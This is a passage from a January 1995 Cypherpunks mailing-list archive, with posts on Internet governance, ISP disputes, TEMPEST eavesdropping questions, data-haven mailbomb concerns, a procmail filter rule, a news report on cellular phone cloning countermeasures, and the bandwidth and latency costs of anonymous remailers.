Time magazine photo feature (which - surprise! - was on Somalia just days before the world suddenly took notice of _that_ problem). The commitment to freedom of expression, in _any form whatsoever_ including the anonymous, is arguably the cause for much of the economic and technological power of the US. It is a matter for concern that, rather than help spread this freedom to the rest of the world (as is inevitable _if_ the Internet continues not to be 'governed'), many in and out of government are attempting to clamp down, out of an almost primeval fear of Digital Evil that stems from ignorance of wider issues. > Certainly, the current state of anarchy in national and global > electronic networks cannot continue if the technology is to achieve > the remarkable benefits that have been predicted in terms of > communications among institutions and individuals, whether > government, business or society at large. The purpose of the On the contrary, the 'current state of anarchy' has largely been responsible for advancements in US research for the two decades since the Internet was born. What is needed, perhaps, is a dialogue to improve understanding among 'society at large' of a community that is, though at present largly composed of technology professionals or academics, an example of multicultural and multinational cooperation and tolerance that would be nice to see in, say, Los Angeles, or elsewhere in the 'real world'. > George B. Trubow, Professor of Law > Director, Center for Informatics Law > The John Marshall Law School > 315 S. Plymouth Ct. > Chicago, IL 60604-3907 > Fax: 312-427-8307; Voice: 312-987-1445 > E-mail: 7trubow at jmls.edu ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From carolann at mm.com Sat Jan 7 03:27:52 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 03:27:52 PST Subject: Big vs Little providers (punkette view) In-Reply-To: Message-ID: Perspective, Perspective, Perspective. You're both right on many counts. Mike is a "fine benevolent dictator". He has many "happy" users. He has now five local Usenet groups of winternet.* But he reneges on deals. The shirts were ready before Thanksgiving. He posseses them as I write. He violates the spirit by which I processed their making (the samples). Many orders for the shirts were made prior to Thanksgiving, I still have the mail for them at squeaky.free.org (good storage place). Then there's the GT story. I organized one for them. Created a sked for more of them. He didn't like the sked. The Users did. There was an incident of much greater magnitude, that drew far less attention. It was my call for WWW crosspost linkages. It was hand posted to 75 or so groups, one at a time. The plus minus ratio of mail was last at 412 positive, and 8 negative. Squeaky has half the mail. There's 50 and growing crossposts that are drawing 200+ accesses a day to that page. Any other page he has on his system is only drawing 40-50 responses at best. I have copies of the daily access statistics /usr/local/ect/httpd/stats/summary If my mail is frozen, so to should all phases of that account, including the WWW Pages. Besides maybe they"have violated acceptable use policy",too! That's just sound administrative policy to shut everything down. You haven't heard about Webbittown, yet. Bruce Sterling owns #9 Blackice Blvd. It's a Web page city of 20,000 individual pages, at a $1,000 a page. Just like Real Estate. Run by doom software drivers. Mike's poor vision is another T1 line, maybe two if he's lucky. They are hacking his machine like crazy, he claims. That means you got some serious enemies, if it's true. That means you don't abuse your fans like me, at a time like that. It also probably means one of his "friends" is his enemy. I have an alt.dream.lucid of having the world's best web server. I dream of people being able to protect their HTML code with PGP. Funtional on top, crypto underneath. Encryption on the fly. This was something that was bound to happen sooner or later. Better sooner than later. Now there's precedent. 10 groups, and the reply's caught in the pine processor 3.91,too! Doc Ozone says pine 3.91's full of leaks. Doc Ozone and I make machines for people who are 'netless'. It's called the tired, poor project. Give us your tired, your poor, your old PC's. Miles, a seven year old is next on the list. We gave Mike a Sparc monitor from one of our equipment forrays. Free,zip, zilch for we got for free zip zilch. He begged for it. It was still sitting in the office wednesday, unfixed for anyone. I equate the thing to a domestic abuse situation. As long as it's minor, as long as it's hushed, it's OK Even this would have been OK if had stayed silent. There is a safety in numbers factor. AOL proves it. And as they descend upon the the net things will change again. The moment I called little tiny Micro Net, I knew there would be fallout. I will not respond to the actual posting unless I'm asked a direct question about the substance of the post. But it's pretty self explanitory, and I cry to think there's a real bitch. Yes, at Netcom, I can now probably get much further, much faster. No I wouldn't subject myself or anyone to Winternet. But I wouldn't subject a newbie to Netcom either. I did it once and was sorry, too. I'm just a punk girl who writes great HTML code. And I hope that it can be protected by cryptograhy, that's my little goal. I hope I have both made you think and feel you are right, because both of you are, in certain kinds of ways. And you know it, too. Now where was I?, oh yeah, Is there like a Remailer for Dummies, quick reference manual? I could have fun learning & doing that. Till My Next Mini-Rant, Love Always, Carol Anne Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From bart at netcom.com Sat Jan 7 03:36:04 1995 From: bart at netcom.com (Harry Bartholomew) Date: Sat, 7 Jan 95 03:36:04 PST Subject: Indexing and searching In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU> Message-ID: <199501071134.DAA17942@netcom4.netcom.com> We sure need some indexing and searching to use the archive. A directory command at ftp.hks.net:/cypherpunks/nntp/cypherpunks get you 8200+ lines of: ... -rw-r--r-- 1 8 8 34609 Sep 24 20:02 3255 -rw-r--r-- 1 8 8 1154 Sep 24 20:24 3256 -rw-r--r-- 1 8 8 1443 Sep 25 03:15 3257 -rw-r--r-- 1 8 8 1675 Sep 25 03:33 3258 -rw-r--r-- 1 8 8 1634 Sep 25 10:35 3259 -rw-r--r-- 1 8 8 3243 Jul 21 23:59 326 -rw-r--r-- 1 8 8 955 Sep 25 11:41 3260 -rw-r--r-- 1 8 8 2088 Sep 25 12:05 3261 -rw-r--r-- 1 8 8 3930 Sep 25 12:06 3262 ... Why its virtually encrypted! How fitting. From jonathon at izanagi.sbi.com Sat Jan 7 03:58:33 1995 From: jonathon at izanagi.sbi.com (Jonathon Fletcher) Date: Sat, 7 Jan 95 03:58:33 PST Subject: No Subject Message-ID: who cypherpunks end From cyber1 at io.org Sat Jan 7 03:59:40 1995 From: cyber1 at io.org (x) Date: Sat, 7 Jan 95 03:59:40 PST Subject: intelligent discovery agents Message-ID: On Fri, 6 Jan 1995 Nesta Stubbs wrote: >> There was some recent talk about network agent technology on this list. >> > does anynoe have any information about intelligent agents? I mean I know > about filter and stuff, but they arent intelligent agents. I assume one > would be something like the WWW worm and other searching scripts that > have a database of information to cross-reference their finds and decide > what to send back to you. You might want to check out Brian LaMacchia's Ph.D. proposal to create a new class of knowbot, to be termed "Internet Fish". It is posted on http://www.swiss.ai.mit.edu/~bal/bal-home.html LaMacchia's proposal is interesting in that his 'fish' seem to have limited autonomy, thus moving us closer to a content-addressable model of net info retrieval. Also of interest is RFC 1728: Resource Transponders, by C. Weider. The idea is that there should be meta-information (information about information) available for use by info retrieval programs like 'archie'. >From ftp://nic.ddn.mil/rfc/rfc1728.txt The following is extracted from LaMacchia's abstract: > We will design, implement and deploy a system for constructing > ``Internet Fish,'' a new type of resource discovery tool. Internet > Fish attempt to discover new sources of information related to a > particular topic; characteristics that describe the topic of interest > may be specified by the user or deduced by the Fish over the course of > time. As part of the information-gathering process Fish conduct > long-term conversations with users; these conversations permit Fish to > ask for human assistance when necessary and allow humans to > dynamically reallocate Fish resources. In addition, Fish facilitate > *serendipitous* resource discovery; that is, the act of finding > interesting information in an unexpected place or manner, information > that we were ``lucky'' to have discovered. From rishab at dxm.ernet.in Sat Jan 7 04:24:43 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 7 Jan 95 04:24:43 PST Subject: Information highways, oceans and islands Message-ID: Electric Dreams #42 examines the notion of distance in and out of cyberspace, and debunks the information highway as a metaphor. Send a blank message with a command in the Subject: line of the header, for more info. 'get dreams-42' (without quotes) for a copy of the article; 'get index' for an index of those so far; and 'subscribe' to receive 5 kbytes every week. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Sat Jan 7 04:25:18 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 7 Jan 95 04:25:18 PST Subject: 3D TV and crypto Message-ID: This just might have a crypto app ;-) Just saw a BBC WSTV report on a 3D TV developed in the UK. Unlike other extremely expensive 3D TVs based on laser-holograms, this one has an ordinary hi-def screen, pointing upwards. A beam splitter crosses the screen at an angle, and reflectors is above and to the side, so the image actually forms as an intersection of three beams in mid-air. A profile view: vvvvvvvvvv <--- reflects down v ^ /< image < < v ^ /< < forms v /> > < <--- reflects left here < < / ^< < < mid-air / ^ < ^^^^^^^^^^ <--- TV image is formed here, facing up The company says 'affordable' models could appear next year. ObCrypto: Suppose the reflector(s) is another TV, displaying a moving-image 'key'? The main TV image could be 'encrypted' by subtracting the 'key' from itself... Voila! And there's more... Suppose the 'key' is light passed through a human hand... Oh you though the first e-mail from a head of state was from Sweden? Queen Elizabeth II sent one in the 70s - according to a wonderful episode of BBC's Tomorrow's World, which did a cyberspace episode that included a sort-of solution to the travelling salesman problem by BT physicists using evolutionary algorithms! The episode DID NOT MENTION CHILD PORNOGRAPHY!!!! ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From jonathon at izanagi.sbi.com Sat Jan 7 04:26:04 1995 From: jonathon at izanagi.sbi.com (Jonathon Fletcher) Date: Sat, 7 Jan 95 04:26:04 PST Subject: your mail Message-ID: On Sat, 7 Jan 1995, Jonathon Fletcher wrote: > who cypherpunks > end I know, I know. I'm sorry. I'll send it to the right place next time. Small slip of the qwertys -Jon -- Jonathon Fletcher, jonathon at japan.sbi.com From carolann at mm.com Sat Jan 7 04:40:49 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 04:40:49 PST Subject: Files and mail In-Reply-To: <199501070607.BAA04310@bb.hks.net> Message-ID: You should paint this as a canvas,and sell it for five big digits. This post right here, in all its mono glory, is real art. On Sat, 7 Jan 1995, L. Todd Masco wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > - -----BEGIN PGP SIGNED MESSAGE----- > > > Anybody want to offer odds on whether or not this merry little exchange > will be reported in Wired as news? > - - -- > Todd Masco | "life without caution/ the only worth living / love for a man/ > cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich > Cactus' Homepage > - - -- > Todd Masco | "life without caution/ the only worth living / love for a man/ > cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich > Cactus' Homepage > > - -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk > kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws > qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit > dA1go4Jiaag= > =eQPF > - -----END PGP SIGNATURE----- > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ > Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA > =g1Bd > -----END PGP SIGNATURE----- > Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 04:52:46 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 04:52:46 PST Subject: Killfiles 101 Message-ID: 1. The best and only way you can be sure you're killing a file is to turn your machine off. Only then can you be sure it is dead. 2. If you must resort to using killfiles, (great marketer trick, make you use it again and again, and again, like a gun) kill "classes" of files, as opposed to individuals, you'll get better kill ratio. A good example is anon or wizvax users. 3. Note: Killfiles are a censor's best friend! And you'll become what you swore you wouldn't. does your signature tell the truth nesta? Can't know everything with a killfile! Eventually you'll kill the file that'd get you sex. Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 05:17:09 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 05:17:09 PST Subject: Dear Zimmy, Message-ID: They still miss the point, I think. They haven't figured out how to teach others. They can do it in ten newsgroups. They whine and snivel like two year old brats. They just can't for the life of them grab the original letter. They can't go teach their top-ten newsgroups. They can't figure out how to come back here and rant how they did it and I didn't (lose my account over it) They rapidly forget crypto loses it's power against a bullet. Eventually they'll come with guns again and take the machines away. There were 10,000 newsgroups I only went to 10. The best kill file is a turned off machine. I touched my first fortran card 22 years ago. There's a lot of difference between showing up the 12th, and showing up in say 12 newsgroups. Sorry Zimmy, It don't look good for the home team. Love Always, Carol Anne Signature back on the drawing board Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 05:32:38 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 05:32:38 PST Subject: A day in the life of the Cypherpunk list Message-ID: Dear Bruce, When you see the actual postings on the last 24 hours, they are all running to the newsgroup to use killfiles. Isn't it ostriches that do that kinda thing? They've been caught napping. The Webbittown Post Office could use all the remail people. Every last one of them And meanwhile, still stuck in the pine composer, lies the original response. Good copy, definitely good copy. Love Always, Carol Anne Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From carolann at mm.com Sat Jan 7 06:02:50 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Sat, 7 Jan 95 06:02:50 PST Subject: intelligent discovery agents In-Reply-To: Message-ID: There's this rad.web.intelligent person by the name of Sang. Visit Sang at http://www.inlink.com/users/sangria/homepage.html Sang has more information on Robots, Spiders, Ants, and Worms than any other computer person I have yet to link up with. Feel free to grab a copy of the Web Server Software while your there. Love Always, Carol Anne On Sat, 7 Jan 1995, x wrote: > On Fri, 6 Jan 1995 Nesta Stubbs wrote: > > >> There was some recent talk about network agent technology on this list. > >> > > does anynoe have any information about intelligent agents? I mean I know Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List Coming Soon: The Internet Debut of CENSORED.COM From jya at pipeline.com Sat Jan 7 07:58:53 1995 From: jya at pipeline.com (John Young) Date: Sat, 7 Jan 95 07:58:53 PST Subject: NYT on Survivalists Message-ID: <199501071559.KAA23283@pipe3.pipeline.com> Philip Weiss writes in tomorrow's Magazine a very long (52K) cover story on Idaho survivalists Bo Gritz, Randy Weaver and the burgeoning anti-government population. The longest story I've seen in there in years. Mentions societal threats of cashless economy, tax nix, and more c'punk tonics. Is The Times getting antsy, seeding a L&O crackdown? Or huffing luridities? See for yerself by sending blank message with subject: SUR_huf From jathomas at netcom.com Sat Jan 7 08:44:51 1995 From: jathomas at netcom.com (John A. Thomas) Date: Sat, 7 Jan 95 08:44:51 PST Subject: TEMPEST Questions... In-Reply-To: <121_9501062145@borderlin.quake.com> Message-ID: On 6 Jan 1995, Derek Zeanah wrote: > > I'm writing an article on TEMPEST technology. > > The focus is on what TEMPEST is and how to defeat it, if possible. So far > I've gotten some insightful information, but I'm looking for all I can get. > > Has anyone ever heard of TEMPEST being used in the continental US? Can anyone > tell me what measures offer some level of protection, or steps that can be > taken to reduce the likelihood of being successfully targeted? Has anyone > ever seen TEMPEST in action? > You might start with van Eck, Wim, "Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?", Computers & Security 4 (1985) 269-286. That will give you the technical basics. If someone has actually seen Tempest interception in action, I'd like to hear about that as well. John A. Thomas jathomas at netcom.com N5RZP 214/263-4351 From root at einstein.ssz.com Sat Jan 7 08:59:01 1995 From: root at einstein.ssz.com (root) Date: Sat, 7 Jan 95 08:59:01 PST Subject: TEMPEST Questions... In-Reply-To: Message-ID: <199501071544.JAA00423@einstein.ssz.com> Hi all, Regarding Tempest, Something similar happens to me in my workshop. I have several computers stacked on two shelves. It is quite commen for several of them to be on at one time. In particular when I have my Amiga 1200 driving my NEC TV/Monitor I notice that it appears on the other composite video monitors even though the Amiga drives RGB. What I think is happening is that the NEC is converting the RGB to standard TV drive rates. The short of it is that I can watch my Amiga 1200 on my TV that is sitting a couple approx 3ft. from it. It could also be the fact that the 1200 has a video output that is poorly shielded. It is capable of driving a composite device directly as well. One aspect that is interesting is that if you have several sources going at once the quality degrades. One possible technique for defeating such monitoring would be to have a couple of standard video recorders drive a video game rf modulator tied to an antenna to provide a 'shell' of drivel from your cable feed. Your VCR may be able to drive the antenna directly. Take care. From dfloyd at io.com Sat Jan 7 09:09:48 1995 From: dfloyd at io.com (dfloyd at io.com) Date: Sat, 7 Jan 95 09:09:48 PST Subject: Data Haven problems Message-ID: <199501071710.LAA21334@pentagon.io.com> -----BEGIN PGP SIGNED MESSAGE----- While programming my data haven code, I am wondering how to guard against spamming the data haven parser. It is trivial to mount a denial of service attack by repeatedly mailing large files. which will fill up the quota or filesystem of the data haven host, and if you have mail on a root partition, will cause hangs or crashes. Any ideas on how to guard against mailbombs, and to confirm to the sender that their files are stored successfully? Perhaps do a mailing with a test command that validates the existance of the file, and sends a reply back wether the file is okay or not, or would this result in a possible security hole? As to the code, this will have to be my second rewrite as I am going to do it in perl code, rather than C... last rewrite was from a daemon to a program activated by a .forward file. Lastly, instead of postage (like a remailer would get), how hard would it be to implement "rent" where if the "rent" is not paid, and a grace period has elapsed the file would be trashed. All this while preserving the anonymity of the sender and the data haven site. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLw7KpFLUeLjqSiixAQHs4wf+Mf4CVx77nXjUXug/3q1hINhCyWgWmal7 vY1WeCDXM+qrrdxUgqzIhYRYpCPKChMjeozFltn9T0CcH/YdaD5hx3dB5A0YUPWZ SpF5oCL3iZzf2veA8BBJEIrFdmts/nFUzWaqMx4+2IcufYb+0kVw/AKi2M5B0ZiT UoOFFIsySR9hIMMIfHlkGqrnoO8LhlViRBx4u1O0bb0GYAyc+Nv6HvDJOSWuVe9C g5B4GMLuW1t9e5Qw3W0Qy1VRIC4QbOrd0zbjDrQ38GUemOjALuZ2h4+tr3bR93KU ZthueqsIzGKlr90PU6AVVZd128mDHLofJO4I4IoOgSPV7XIK4tufyA== =KZk0 -----END PGP SIGNATURE----- From root at einstein.ssz.com Sat Jan 7 09:21:03 1995 From: root at einstein.ssz.com (root) Date: Sat, 7 Jan 95 09:21:03 PST Subject: Data Haven problems In-Reply-To: <199501071710.LAA21334@pentagon.io.com> Message-ID: <199501071606.KAA00541@einstein.ssz.com> > > > While programming my data haven code, I am wondering how to guard against > spamming the data haven parser. It is trivial to mount a denial of > service attack by repeatedly mailing large files. which will fill up the > quota or filesystem of the data haven host, and if you have mail on a > root partition, will cause hangs or crashes. > If there is no cost associated with the haven and there are no account limitations (ie anyone can get an account) then I don't see a means to do it reliably. However, if you work up a fee based scheme such that you charge per M then it is trivial. If the data is larger than the account balance it bounces. By limiting the availability of accounts you can make it less enticeing for users to spam the haven because they are hurting themselves. And it is assumed that since the accounts are limited that there is an assumed web of trust working. > Any ideas on how to guard against mailbombs, and to confirm to the sender > that their files are stored successfully? Perhaps do a mailing with > a test command that validates the existance of the file, and sends a > reply back wether the file is okay or not, or would this result in a > possible security hole? > It seems to me that a message should come back only if there is a problem. > As to the code, this will have to be my second rewrite as I am going to > do it in perl code, rather than C... last rewrite was from a daemon to > a program activated by a .forward file. > > Lastly, instead of postage (like a remailer would get), how hard would it > be to implement "rent" where if the "rent" is not paid, and a grace period > has elapsed the file would be trashed. All this while preserving the > anonymity of the sender and the data haven site. > This form of dating files is pretty commen in bbs systems where if a user doesn't log in for say 30 days the account and its contents are deleted. To do this doesn't even require knowing anything about the user other than how long the files have been there versus how long they are supposed to be there. From adwestro at ouray.Denver.Colorado.EDU Sat Jan 7 09:38:57 1995 From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope) Date: Sat, 7 Jan 95 09:38:57 PST Subject: Peter D. Lewis In-Reply-To: <199501070558.AAA04212@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 7 Jan 1995, "L. Todd Masco" wrote: > Like "Seventeen," "Wired" should prepend "don't you wish you were" to > its title. Ah, yes, I wish I were "(c) Both of the above" -- as the Sinatra lyric sez, "When I was seventeen, it was a very WiReD year..." I think generalizing about "Wired" is like generalizing about the NY Times, where Markoff and Lewis arguably exemplify the best and worst of mainstream computer/telecom journalism. "Wired" has many flaws, but I consider Steven Levy's articles about Cypherpunks, Whitfield Diffie, and digital cash to be among the best expositions of Cypherpunk issues for the layperson. (Kelly's "Whole Earth Review" piece is another.) I can forgive some faults in return for seeing Levy's non-technical explanations of public-key crypto and the Dining Cryptographers protocol in successive issues. :-) Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw7QeVRRFMq4NZY5AQEc8AQAqZ/Yp7+yEEYikZja/bF8c468I4C147q7 7AjuMsT1NN0Yt9HZB+mxtKdrbOL7QLyJgbk3c6NJ18nUkianZTnQNCEzr35BYwh7 7dCsIsiMWUVdjmahjEeppJZvKAZrRioW0KAMTnmPK6vWFXtttS0kl5k5FG/na3+n KJoDdNOVsTg= =lcQW -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sat Jan 7 10:08:06 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sat, 7 Jan 95 10:08:06 PST Subject: A Fire Upon the Deep In-Reply-To: Message-ID: <199501071808.NAA09510@bwh.harvard.edu> Anonymous mail has bandwidth costs that are only slightly higher than regular mail. You could hide quite a bit in most video packets. The latency is a reflection of the lack of volume, because volume is needed for reordering. If your favorite remailer gets more mail, the latency will drop. Also, on the book trend, Neal Stephenson's new book, The Diamond Age (Bantam Spectra, 1995) has a brilliant hacker dump information he comes across becuase its encrypted, and he knows he'll never manage to break the encryption scheme. I haven't finished it, but its quite good about 1/3 of the way through. Adam Wei Dai wrote: | One more thing that's marginally related to cypherpunks (hey I really | like this book so I'll take any chance I can to talk about it ;-) is | the idea that the efficiency of distributed computation (and distributed | intelligence) depends on high bandwidth and low latency of the communication | medium. Since anonymity seems to have rather high costs in terms of | bandwidth and latency (compare anonymous e-mail with internet video | conferencing or even with normal e-mail), this implies that | an organization of anonymous agents will not work as efficiently as | a similar orginzation whose members are not concerned about | anonymity. -- "It is seldom that liberty of any kind is lost all at once." -Hume From adam at bwh.harvard.edu Sat Jan 7 10:19:54 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sat, 7 Jan 95 10:19:54 PST Subject: procmail In-Reply-To: Message-ID: <199501071818.NAA09659@bwh.harvard.edu> ftp.informatik.rwth-aachen.de:/pub/packages/procmail I find I need the following rule to get everything sent to cypherpunks: :0 * (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks at toad.com) From weidai at eskimo.com Sat Jan 7 10:47:56 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 10:47:56 PST Subject: A Fire Upon the Deep In-Reply-To: <199501071808.NAA09510@bwh.harvard.edu> Message-ID: On Sat, 7 Jan 1995, Adam Shostack wrote: > Anonymous mail has bandwidth costs that are only slightly > higher than regular mail. You could hide quite a bit in most video > packets. The latency is a reflection of the lack of volume, because > volume is needed for reordering. If your favorite remailer gets more > mail, the latency will drop. Anonymous e-mail that goes through a chain of N remailers will cost at least N times as much bandwidth and have N times as much latency as normal e-mail. But e-mail is hardly the state-of-the-art of network communication, while anonymous e-mail IS the state of the art for anonymous communication. How long will it take for the technology of anonymous video conferencing to develope, for example? By then, of course, those who are not concerned with anonymity will probably have things such as full sensory virtual interaction. Note that I SUPPORT anonymous communication, but its costs of bandwidth and latency may be a real obsticle to developing Cryptoanarchy (of the kind described by Tim May) if most people are not willing to put up with those costs. Wei Dai PGP encrypted mail welcome. From an172607 at anon.penet.fi Sat Jan 7 10:55:27 1995 From: an172607 at anon.penet.fi (duquesne duke) Date: Sat, 7 Jan 95 10:55:27 PST Subject: cel fraud Message-ID: <9501071759.AA00953@anon.penet.fi> Fighting Cellular Fraud, New York To Washington BEDMINSTER, NEW JERSEY, U.S.A., 1995 JAN 6 (NB) -- Bell Atlantic Mobile (BAM, parent NYSE:BEL) and NYNEX Mobile Communications (parent NYSE:NYN), two large US cellular phone carriers, are about to block automatic "roaming" service in New York City and surrounding areas. Starting January 9, BAM customers who place calls in the city will need to enter a personal identification number (PIN) issued by BAM in order to complete the call. The new policy is an antifraud measure to combat criminals who steal cellular service, BAM said. The PIN system was developed by NYNEX and is in use inside the City now, NYNEX sources said. Both firms emphasized that the new policy is no magic wand to do away with cellular fraud. However, as a BAM spokesperson told Newsbytes, the combination of restricted roaming and PIN numbers will "raise the bar again" where cellular fraud is concerned. Under the new system, the two cellular carriers will restrict calls in the greater NYC area by roaming customers from a "Fraud Protection Zone" that includes Washington, D.C.; Baltimore; Pittsburgh; and greater Philadelphia, including Delaware and southern New Jersey. BAM adopted the new measures because of increasing problems with cloning, in which a criminal picks off a cellular customer's automated phone IDs during a legitimate call and uses them to make a "clone phone." The cloned phone can be used to make calls for which the legitimate customers, not the cloners, are billed. AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations have become such a successful criminal industry that some criminals sell the phones with 30-day guarantees. "If a number is cut off, you can bring it back to the cellular bandits and have it reprogrammed for no additional charge," he explained. "It costs the carriers around $1 million a day." He paused, then added: "It just shows how big a demand there is for wireless communications." Under the new policy, customers from inside the protected zone who want to use their phones at standard "roaming" rates in New York City must first contact BAM by dialing 211 from their cellular phone. After they provide proper identification and select a PIN code, the company deactivates the fraud zone lock-out. NYNEX spokesperson Kim Ancin told Newsbytes that customers with PIN numbers place calls as much usual by dialing the destination number and pressing the Send button. However, on protected phones, the customer then punches in the PIN number and presses Send again. Ancin explained that the PIN number goes out on a frequency different from the initial send. Cellular bandits use special equipment to pick up a legitimate phone's mobile identification number (MIN) and electronic serial number (ESN), which until now have been enough to clone a phone. However, she said, adding a PIN number on a second frequency makes cloning much more difficult. BAM said it would not activate the fraud protection lock-out in northern New Jersey, where calls to New York City are local calls. However, since customers who travel frequently into the city are at risk from cloning, the firm strongly recommended that northern New Jersey customers sign up for a PIN. Eventually, the firm said, all new customers will be required to select PINs. BAM said if a bandit does succeed in cloning a PIN-equipped phone, a customer can simply change the PIN number. Customers without PIN numbers must bring their phones back to a carrier or dealer to install a new phone number, notify business associates and friends of the number change, and modify business cards and stationery. There is no extra charge for PIN numbers, which are implemented by software at the carrier's switch, BAM's Fleischer told Newsbytes. The feature will not affect commonly used cellular services like voice mail or call waiting. Calls to 911, 611 and 411 will not require a PIN. (Craig Menefee/19950106/Press Contact: Steve Fleischer, 908-306-7539 or Brian Wood, 908-306-7508, both of BAM; Kim Ancin, 914-365-7573, or Jim Gerace, 914- 365-7712, both of NYNEX) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From peb at netcom.com Sat Jan 7 11:19:20 1995 From: peb at netcom.com (Paul E. Baclace) Date: Sat, 7 Jan 95 11:19:20 PST Subject: TEMPEST Questions... Message-ID: <199501071919.LAA22533@netcom19.netcom.com> Grady Ward wrote an article on implementing something like TEMPEST ("something like" means that it was not derived from classified documents). I can't seem to find my copy of his text and it doesn't appear anymore at netcom:/ftp/pub/gr/grady...Anyyone have a pointer to this? This article is definitely the most practical and comprehensive that I've seen on this subject. Paul E. Baclace peb at netcom.com peb at eng.sun.com From doumakes at netcom.com Sat Jan 7 11:27:20 1995 From: doumakes at netcom.com (Don Doumakes) Date: Sat, 7 Jan 95 11:27:20 PST Subject: Let's NOT talk about Netcom Message-ID: <199501071927.LAA09582@netcom20.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- If I wanted to read flamage about Netcom, I'd check out netcom.general, which is 150 messages a day of, mostly, garbage. I earnestly request that we not duplicate that clutter on the cpunks list. - -- ______________________________________________________________________ Don Doumakes Finger doumakes at netcom.com for PGP public key Foxpro databases built to your specifications. Email me for details. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLw6RQxtumcu2AjihAQHKTwP/fMxLVjDp/9yO2hFkCJQ+Vo5PGQvEAakt KiCrs3nTsbZwkwxjyzgwgnuJkOVcIWgIndkO+AViI4zmOTT+9lp2FlK3gdv1qIWl +pI/rkcegd9jyzRxz+HybONLtppAft8RZ6UlPmzS2w2Il+oHIPK9OtxRH5bGXj2D YHzBctPXYt0= =msXo -----END PGP SIGNATURE----- From tcmay at netcom.com Sat Jan 7 11:50:42 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 11:50:42 PST Subject: Latency Costs of Anonymity In-Reply-To: Message-ID: <199501071950.LAA22106@netcom17.netcom.com> [thread name changed to reflect actual topic] Wei Dai wrote: > Note that I SUPPORT anonymous communication, but its costs of bandwidth > and latency may be a real obsticle to developing Cryptoanarchy (of the > kind described by Tim May) if most people are not willing to put up with > those costs. > The good news is that many of the messages that people want anonymity for are *text* files, e.g., offers of services, controversial data or opinions, etc. There's a kind of tradeoff in size and urgency. To wit, it is seldom "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I can't draw my favorite little diagram here showing the space of messages, with "urgency" and "size" as the axes.) However, I will try such a diagram here: ^ ^ | |short <---there are very few large files URGENCY |messages that must be urgently transmitted | | | | non-urgent | huge files ----------------------> text books videos 10K 1 MB 1GB S I Z E ---> (The tradeoffs are of viewing time, caching, information, etc. A short message can be _read_ quickly, and hence may need to be transmitted quickly. The canonical "Attack at dawn" message, for example. A long message, such as my 